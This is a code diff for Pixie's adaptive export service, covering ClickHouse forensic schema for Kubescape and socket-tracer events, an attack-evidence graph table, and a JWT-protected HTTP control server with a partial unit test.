+-- compat with any existing Vector pipeline that already populates it; the
+-- operator does not depend on it being non-empty.
+CREATE TABLE IF NOT EXISTS forensic_db.kubescape_logs (
+ BaseRuntimeMetadata String,
+ CloudMetadata String,
+ RuleID String,
+ RuntimeK8sDetails String,
+ RuntimeProcessDetails String,
+ event String,
+ event_time UInt64,
+ hostname String,
+ level String DEFAULT '',
+ message String DEFAULT '',
+ msg String DEFAULT '',
+ processtree_depth String DEFAULT '',
+ anomaly_hash String DEFAULT ''
+) ENGINE = MergeTree()
+ ORDER BY (event_time, hostname)
+ PARTITION BY toYYYYMM(toDateTime(event_time))
+ TTL toDateTime(event_time) + INTERVAL 30 DAY DELETE
+ SETTINGS index_granularity = 8192;
+
+-- ============================================================================
+-- 12 Pixie socket_tracer tables — strongly predefined, namespace + pod added.
+-- The retention scripts (PxL, user-defined or shipped defaults) MUST populate
+-- namespace + pod via px.upid_to_namespace / px.upid_to_pod_name.
+-- ============================================================================
+
+-- http_events — pixie/src/stirling/source_connectors/socket_tracer/http_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.http_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ major_version Int64,
+ minor_version Int64,
+ content_type Int64,
+ req_headers String,
+ req_method String,
+ req_path String,
+ req_body String,
+ req_body_size Int64,
+ resp_headers String,
+ resp_status Int64,
+ resp_message String,
+ resp_body String,
+ resp_body_size Int64,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- http2_messages.beta — http2_messages_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.`http2_messages.beta` (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ stream_id Int64,
+ headers String,
+ body String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- dns_events — dns_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.dns_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_header String,
+ req_body String,
+ resp_header String,
+ resp_body String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- redis_events — redis_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.redis_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd String,
+ req_args String,
+ resp String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- mysql_events — mysql_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.mysql_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd Int64,
+ req_body String,
+ resp_status Int64,
+ resp_body String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- pgsql_events — pgsql_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.pgsql_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req String,
+ resp String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- cql_events — cass_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.cql_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_op Int64,
+ req_body String,
+ resp_op Int64,
+ resp_body String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- mongodb_events — mongodb_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.mongodb_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd String,
+ req_body String,
+ resp_status String,
+ resp_body String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- kafka_events.beta — kafka_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.`kafka_events.beta` (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd Int64,
+ client_id String,
+ req_body String,
+ resp String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- amqp_events — amqp_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.amqp_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ frame_type Int64,
+ channel Int64,
+ method String,
+ payload String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- mux_events — mux_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.mux_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_type Int64,
+ req String,
+ resp String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- tls_events — tls_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.tls_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ version Int64,
+ content_type Int64,
+ handshake String,
+ latency Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- conn_stats — conn_stats_table.h
+-- Connection-level statistics (open/close/active counters + bytes_sent/recv +
+-- protocol/ssl). Re-added to the rev-2 schema so the
+-- adaptive_export retention scripts can persist it. local_addr/local_port are
+-- intentionally absent — the pixie kConnStatsElements set carries only
+-- remote_addr/remote_port (the connection is identified by the local upid +
+-- the remote tuple). Counters are MERGEd by ClickHouse over the (hostname,
+-- event_time) order; no aggregating engine because each retention-script
+-- pull is a discrete snapshot row.
+CREATE TABLE IF NOT EXISTS forensic_db.conn_stats (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String,
+ pod String,
+ remote_addr String,
+ remote_port Int64,
+ trace_role Int64,
+ addr_family Int64,
+ protocol Int64,
+ ssl UInt8,
+ conn_open Int64,
+ conn_close Int64,
+ conn_active Int64,
+ bytes_sent Int64,
+ bytes_recv Int64,
+ hostname String,
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3)
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- ============================================================================
+-- adaptive_attribution — operator's only write target in ClickHouse.
+--
+-- One row per active anomaly hash per node. The operator inserts one row
+-- per arriving kubescape_log on its node. ReplacingMergeTree(t_end) collapses
+-- re-inserts to the row with the largest t_end — so each fresh anomaly with
+-- the same hash extends the active window automatically; stale rows merge
+-- away.
+--
+-- Analyst joins:
+--
+-- SELECT he.*, attr.anomaly_hash
+-- FROM forensic_db.http_events he
+-- ASOF INNER JOIN forensic_db.adaptive_attribution attr
+-- ON he.hostname = attr.hostname
+-- AND he.namespace = attr.namespace
+-- AND he.pod = attr.pod
+-- AND he.time_ >= attr.t_start
+-- WHERE he.time_ <= attr.t_end
+-- AND attr.anomaly_hash = '';
+--
+-- Boot-time rehydration of the operator's in-memory active set:
+--
+-- SELECT * FROM forensic_db.adaptive_attribution FINAL
+-- WHERE hostname = '' AND t_end > now64(9);
+--
+-- DateTime64(9, 'UTC') — pin tz so bare-string serialization is
+-- unambiguous; without it, CH parses incoming timestamps in the
+-- server-session timezone and silently shifts values on non-UTC hosts.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.adaptive_attribution (
+ anomaly_hash String,
+ namespace String,
+ pod String,
+ comm String,
+ pid UInt64,
+ hostname String,
+ t_start DateTime64(9, 'UTC'),
+ t_end DateTime64(9, 'UTC'),
+ last_seen DateTime64(9, 'UTC'),
+ last_rule_id String,
+ n_anomalies UInt64
+) ENGINE = ReplacingMergeTree(t_end)
+ PARTITION BY toYYYYMM(t_start)
+ ORDER BY (hostname, anomaly_hash);
+
+-- ============================================================================
+-- trigger_watermark — persistent cursor for the kubescape_logs trigger.
+--
+-- Per node, per source-table. The operator advances the row's `watermark`
+-- (UInt64 event_time, ns) every time it successfully drains a batch of
+-- kubescape rows. On restart it reads the row back and resumes from there
+-- instead of replaying the full table from event_time=0 (which, on a busy
+-- cluster, produces multi-GiB single-shot SELECTs that the HTTP client
+-- times out on, never advancing → infinite stuck loop).
+--
+-- ReplacingMergeTree(updated_at) collapses re-inserts to the newest, so
+-- the operator can INSERT cheaply without bothering with UPDATE
+-- semantics. Reads use FINAL — cheap because cardinality is one row per
+-- (hostname, table_name).
+--
+-- This is the operator's second write target alongside adaptive_attribution.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.trigger_watermark (
+ hostname String,
+ table_name String,
+ watermark UInt64,
+ updated_at DateTime64(9, 'UTC')
+) ENGINE = ReplacingMergeTree(updated_at)
+ PARTITION BY hostname
+ ORDER BY (hostname, table_name);
+
+-- ============================================================================
+-- ae_reconcile — per-pull write-fidelity instrument (gated by ADAPTIVE_RECONCILE).
+--
+-- One row per data-plane pull: how many rows AE READ back from Pixie for a
+-- (table, pod, window) vs how many it WROTE to ClickHouse. Lets a reconcile
+-- run localize any loss to a single hop:
+-- read < px-direct PEM count → query/window/filter miss (R5)
+-- wrote < read → sink/batch drop (R6)
+-- CH distinct > read → re-pull duplication (C8)
+-- Plain MergeTree (append-only debug log). NOT a pixie observation table and
+-- NOT in PixieTables(); the operator creates it so a reconcile run has a
+-- target without manual DDL.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile (
+ ts DateTime64(9, 'UTC'),
+ mode String,
+ table_name String,
+ namespace String,
+ pod String,
+ win_start DateTime64(9, 'UTC'),
+ win_end DateTime64(9, 'UTC'),
+ read_count Int64,
+ wrote_count Int64,
+ write_err String,
+ hostname String
+) ENGINE = MergeTree
+ PARTITION BY toYYYYMMDD(ts)
+ ORDER BY (table_name, ts)
+ -- append-only debug log; cap growth so long reconcile runs don't accumulate
+ -- unbounded storage (CodeRabbit). 30d matches the pixie observation tables.
+ TTL toDateTime(ts) + INTERVAL 30 DAY DELETE;
+
+-- dx_attack_graph — dx evidence-graph edge list: one row per directed hop of an
+-- investigation (delivery/egress/execution/exfil/pivot), read by the Pixie
+-- dx_evidence_graph UI via px.DataFrame(clickhouse_dsn=...). Operator-owned
+-- (dx emits the edges, AE persists them); NOT a pixie socket_tracer table.
+--
+-- event_time (unix NANOSECONDS) + hostname are REQUIRED: Pixie's clickhouse_dsn
+-- query template hardcodes `WHERE event_time >= ... AND hostname = ... ORDER BY
+-- event_time` — a table without those columns fails with "Unknown identifier
+-- event_time". Same convention as kubescape_logs. event_time is nanos, so the
+-- partition/TTL use fromUnixTimestamp64Nano (toDateTime would read ns as seconds
+-- → year ~58e9 → broken partitions; see the soc#225 fix).
+CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph (
+ investigation_id String,
+ event_time UInt64,
+ hostname String,
+ requestor_pod String,
+ responder_pod String,
+ requestor_service String,
+ responder_service String,
+ requestor_ip String,
+ responder_ip String,
+ -- Int64/Float64 ONLY for the numeric columns: Pixie's clickhouse_dsn type
+ -- mapper reads UInt8 as BOOLEAN and does not handle UInt16/UInt32/Float32,
+ -- so those fail px marshaling with "Column[N] given incorrect type". Int64
+ -- + Float64 map cleanly (INT64→Int64, FLOAT64→Float64). event_time stays
+ -- UInt64 (same as kubescape_logs, which px reads fine).
+ weight Int64,
+ max_severity Int64,
+ confidence Float64,
+ edge_kind String,
+ `condition` String,
+ criteria String,
+ num_findings Int64
+) ENGINE = MergeTree()
+ ORDER BY (event_time, hostname)
+ PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time))
+ TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE
+ SETTINGS index_granularity = 8192;
+
+-- dx_attack_graph_malicious — rule-ins-only view (condition != '') the
+-- dx_evidence_graph UI reads by default so benign rows stay in ClickHouse.
+CREATE VIEW IF NOT EXISTS forensic_db.dx_attack_graph_malicious AS
+ SELECT * FROM forensic_db.dx_attack_graph WHERE `condition` != '';
diff --git a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
index 4d19f27afab..393e71fe298 100644
--- a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
@@ -18,17 +18,12 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library")
go_library(
name = "config",
- srcs = [
- "config.go",
- "definition.go",
- ],
+ srcs = ["config.go"],
importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/config",
visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
deps = [
"//src/utils/shared/k8s",
- "//src/vizier/services/adaptive_export/internal/script",
"@com_github_sirupsen_logrus//:logrus",
- "@in_gopkg_yaml_v2//:yaml_v2",
"@io_k8s_apimachinery//pkg/apis/meta/v1:meta",
"@io_k8s_client_go//kubernetes",
"@io_k8s_client_go//rest",
diff --git a/src/vizier/services/adaptive_export/internal/config/definition.go b/src/vizier/services/adaptive_export/internal/config/definition.go
deleted file mode 100644
index 2f663ac9422..00000000000
--- a/src/vizier/services/adaptive_export/internal/config/definition.go
+++ /dev/null
@@ -1,65 +0,0 @@
-// Copyright 2018- The Pixie Authors.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-// SPDX-License-Identifier: Apache-2.0
-
-package config
-
-import (
- "os"
- "path/filepath"
- "strings"
-
- "gopkg.in/yaml.v2"
-
- "px.dev/pixie/src/vizier/services/adaptive_export/internal/script"
-)
-
-const scriptExtension = ".yaml"
-
-// ReadScriptDefinitions reads the script definition from the given directory path.
-// Only .yaml files are read and subdirectories are not traversed.
-func ReadScriptDefinitions(dir string) ([]*script.ScriptDefinition, error) {
- if _, err := os.Stat(dir); os.IsNotExist(err) {
- return nil, nil
- }
- files, err := os.ReadDir(dir)
- if err != nil {
- return nil, err
- }
- var l []*script.ScriptDefinition
- for _, file := range files {
- if strings.HasSuffix(file.Name(), scriptExtension) {
- description, err := readScriptDefinition(filepath.Join(dir, file.Name()))
- if err != nil {
- return nil, err
- }
- l = append(l, description)
- }
- }
- return l, nil
-}
-
-func readScriptDefinition(path string) (*script.ScriptDefinition, error) {
- content, err := os.ReadFile(path)
- if err != nil {
- return nil, err
- }
- var definition script.ScriptDefinition
- err = yaml.Unmarshal(content, &definition)
- if err != nil {
- return nil, err
- }
- return &definition, nil
-}
diff --git a/src/vizier/services/adaptive_export/internal/control/BUILD.bazel b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel
new file mode 100644
index 00000000000..c22b1b8ba71
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel
@@ -0,0 +1,41 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "control",
+ srcs = ["server.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/control",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/shared/services/utils",
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
+
+pl_go_test(
+ name = "control_test",
+ srcs = ["server_test.go"],
+ embed = [":control"],
+ deps = [
+ "//src/shared/services/utils",
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/control/server.go b/src/vizier/services/adaptive_export/internal/control/server.go
new file mode 100644
index 00000000000..05837596d6a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/control/server.go
@@ -0,0 +1,237 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package control is the external control surface. It lets the controller
+// (the diagnostician) steer this AE (the hands): start/stop exporting a
+// target, and order a specific (table, window) query. AE's existing
+// kubescape-trigger → controller → activeSet flow is untouched; this is an
+// additional, env-gated driver of the same activeSet. Off unless
+// CONTROL_ADDR is set.
+//
+// The handlers depend on narrow interfaces (exporter, queryRunner) — not on
+// the concrete Controller — so the package is unit-testable with fakes and so
+// the blast radius on AE is a single wiring line in main.go.
+package control
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "net/http"
+ "strings"
+ "time"
+
+ jwtutils "px.dev/pixie/src/shared/services/utils"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// exporter is the slice of *activeset.ActiveSet this package needs: the controller
+// decides membership, AE's streaming/controller acts on the deltas.
+type exporter interface {
+ Upsert(k activeset.Key, tEnd time.Time)
+ Remove(k activeset.Key)
+}
+
+// queryRunner executes one controller-ordered (table, target, window) query and
+// writes the result through AE's normal sink. The query_id is carried so
+// exported rows can be flagged provisional→confirmed/benign_retire (audit).
+type queryRunner interface {
+ OrderQuery(target anomaly.Target, table string, start, end time.Time, queryID string) error
+}
+
+// graphWriter persists dx evidence-graph edges (newline-delimited JSON,
+// JSONEachRow) to forensic_db.dx_attack_graph. nil → /dx/attack_graph 501s.
+type graphWriter interface {
+ WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error
+}
+
+// Server is the control HTTP surface.
+type Server struct {
+ set exporter
+ runner queryRunner // may be nil; /query then returns 501
+ graph graphWriter // may be nil; /dx/attack_graph then returns 501
+ mux *http.ServeMux
+ verify func(bearer string) error // nil → auth disabled; set via SetAuth
+}
+
+// New builds the control server. runner may be nil for deployments that
+// only need start/stop (no operator-side one-shot queries).
+func New(set exporter, runner queryRunner) *Server {
+ s := &Server{set: set, runner: runner, mux: http.NewServeMux()}
+ s.mux.HandleFunc("/healthz", s.handleHealth)
+ s.mux.HandleFunc("/export/start", s.handleStart)
+ s.mux.HandleFunc("/export/stop", s.handleStop)
+ s.mux.HandleFunc("/query", s.handleQuery)
+ s.mux.HandleFunc("/dx/attack_graph", s.handleDXAttackGraph)
+ return s
+}
+
+// SetGraphWriter wires the dx_attack_graph sink.
+func (s *Server) SetGraphWriter(g graphWriter) { s.graph = g }
+
+// SetAuth turns on bearer-JWT auth for the control surface, verified with the
+// SAME shared lib + signing key the vizier broker/PEM use (px.dev/pixie/src/
+// shared/services/utils). dx already mints a service JWT (GenerateJWTForService,
+// PL_JWT_SIGNING_KEY) for its broker/PEM queries — it attaches the same token
+// here. No new secret/crypto. /healthz stays open for k8s probes.
+// (CodeRabbit: protect control endpoints with auth — server.go.)
+func (s *Server) SetAuth(signingKey, audience string) {
+ s.verify = func(bearer string) error {
+ _, err := jwtutils.ParseToken(bearer, signingKey, audience)
+ return err
+ }
+}
+
+// Handler exposes the mux (for httptest + main.go wiring), wrapped in the auth
+// middleware when SetAuth was called.
+func (s *Server) Handler() http.Handler {
+ if s.verify == nil {
+ return s.mux
+ }
+ return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ if r.URL.Path != "/healthz" { // probes stay unauthenticated
+ const p = "Bearer "
+ h := r.Header.Get("Authorization")
+ if !strings.HasPrefix(h, p) || s.verify(strings.TrimPrefix(h, p)) != nil {
+ w.WriteHeader(http.StatusUnauthorized)
+ return
+ }
+ }
+ s.mux.ServeHTTP(w, r)
+ })
+}
+
+// handleDXAttackGraph ingests a JSON array of dx evidence-graph edges and writes
+// them to forensic_db.dx_attack_graph (as JSONEachRow).
+func (s *Server) handleDXAttackGraph(w http.ResponseWriter, r *http.Request) {
+ if r.Method != http.MethodPost {
+ w.WriteHeader(http.StatusMethodNotAllowed)
+ return
+ }
+ if s.graph == nil {
+ w.WriteHeader(http.StatusNotImplemented)
+ return
+ }
+ var edges []json.RawMessage
+ if !decode(r, &edges) {
+ w.WriteHeader(http.StatusBadRequest)
+ return
+ }
+ if len(edges) == 0 {
+ w.WriteHeader(http.StatusAccepted)
+ return
+ }
+ var buf bytes.Buffer
+ for _, e := range edges {
+ buf.Write(e)
+ buf.WriteByte('\n')
+ }
+ if err := s.graph.WriteAttackGraph(r.Context(), buf.Bytes()); err != nil {
+ w.WriteHeader(http.StatusBadGateway)
+ return
+ }
+ w.WriteHeader(http.StatusAccepted)
+}
+
+// ── wire types ────────────────────────────────────────────────────────
+type targetReq struct {
+ Namespace string `json:"namespace"`
+ Pod string `json:"pod"`
+ Comm string `json:"comm"`
+}
+
+type startReq struct {
+ targetReq
+ TEnd int64 `json:"t_end"` // unix seconds
+}
+
+type queryReq struct {
+ targetReq
+ Table string `json:"table"`
+ Window [2]int64 `json:"window"` // [start,end] unix seconds
+ QueryID string `json:"query_id"`
+}
+
+func (t targetReq) key() activeset.Key {
+ return activeset.Key{Namespace: t.Namespace, Pod: t.Pod}
+}
+
+func (t targetReq) target() anomaly.Target {
+ return anomaly.Target{Comm: t.Comm, Pod: t.Pod, Namespace: t.Namespace}
+}
+
+func decode(r *http.Request, v any) bool {
+ defer r.Body.Close()
+ return json.NewDecoder(r.Body).Decode(v) == nil
+}
+
+// ── handlers ──────────────────────────────────────────────────────────
+func (s *Server) handleHealth(w http.ResponseWriter, r *http.Request) {
+ w.WriteHeader(http.StatusOK)
+}
+
+func (s *Server) handleStart(w http.ResponseWriter, r *http.Request) {
+ if r.Method != http.MethodPost {
+ w.WriteHeader(http.StatusMethodNotAllowed)
+ return
+ }
+ var req startReq
+ if !decode(r, &req) || req.Pod == "" || req.TEnd <= 0 {
+ w.WriteHeader(http.StatusBadRequest)
+ return
+ }
+ s.set.Upsert(req.key(), time.Unix(req.TEnd, 0))
+ w.WriteHeader(http.StatusAccepted)
+}
+
+func (s *Server) handleStop(w http.ResponseWriter, r *http.Request) {
+ if r.Method != http.MethodPost {
+ w.WriteHeader(http.StatusMethodNotAllowed)
+ return
+ }
+ var req targetReq
+ if !decode(r, &req) || req.Pod == "" {
+ w.WriteHeader(http.StatusBadRequest)
+ return
+ }
+ s.set.Remove(req.key())
+ w.WriteHeader(http.StatusAccepted)
+}
+
+func (s *Server) handleQuery(w http.ResponseWriter, r *http.Request) {
+ if r.Method != http.MethodPost {
+ w.WriteHeader(http.StatusMethodNotAllowed)
+ return
+ }
+ if s.runner == nil {
+ w.WriteHeader(http.StatusNotImplemented)
+ return
+ }
+ var req queryReq
+ if !decode(r, &req) || req.Pod == "" || req.Table == "" || req.QueryID == "" ||
+ req.Window[0] <= 0 || req.Window[1] <= 0 || req.Window[0] >= req.Window[1] {
+ w.WriteHeader(http.StatusBadRequest)
+ return
+ }
+ err := s.runner.OrderQuery(req.target(), req.Table,
+ time.Unix(req.Window[0], 0), time.Unix(req.Window[1], 0), req.QueryID)
+ if err != nil {
+ w.WriteHeader(http.StatusBadGateway)
+ return
+ }
+ w.WriteHeader(http.StatusAccepted)
+}
diff --git a/src/vizier/services/adaptive_export/internal/control/server_test.go b/src/vizier/services/adaptive_export/internal/control/server_test.go
new file mode 100644
index 00000000000..429cdf8a472
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/control/server_test.go
@@ -0,0 +1,199 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package control
+
+import (
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "testing"
+ "time"
+
+ jwtutils "px.dev/pixie/src/shared/services/utils"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// fakeExporter records Upsert/Remove calls (the controller → activeSet contract).
+type fakeExporter struct {
+ upserts []activeset.Key
+ removes []activeset.Key
+ lastEnd time.Time
+}
+
+func (f *fakeExporter) Upsert(k activeset.Key, tEnd time.Time) {
+ f.upserts = append(f.upserts, k)
+ f.lastEnd = tEnd
+}
+func (f *fakeExporter) Remove(k activeset.Key) { f.removes = append(f.removes, k) }
+
+// fakeRunner records OrderQuery calls; err controls the failure path.
+type fakeRunner struct {
+ calls []string // "table|ns/pod|queryID"
+ err error
+}
+
+func (f *fakeRunner) OrderQuery(t anomaly.Target, table string, start, end time.Time, qid string) error {
+ f.calls = append(f.calls, table+"|"+t.Namespace+"/"+t.Pod+"|"+qid)
+ return f.err
+}
+
+func do(t *testing.T, srv *Server, method, path, body string) *http.Response {
+ t.Helper()
+ req := httptest.NewRequest(method, path, strings.NewReader(body))
+ w := httptest.NewRecorder()
+ srv.Handler().ServeHTTP(w, req)
+ return w.Result()
+}
+
+// TestControlAuth: with SetAuth on, every endpoint except /healthz requires a
+// valid bearer JWT minted by the shared lib (the same one dx uses); missing/bad
+// tokens get 401. (CodeRabbit: protect control endpoints with auth.)
+func TestControlAuth(t *testing.T) {
+ const key = "0123456789abcdef0123456789abcdef" // HS256 test key
+ srv := New(&fakeExporter{}, nil)
+ srv.SetAuth(key, "vizier")
+ h := srv.Handler()
+
+ good, err := jwtutils.SignJWTClaims(jwtutils.GenerateJWTForService("dx", "vizier"), key)
+ if err != nil {
+ t.Fatalf("mint token: %v", err)
+ }
+ call := func(path, auth string) int {
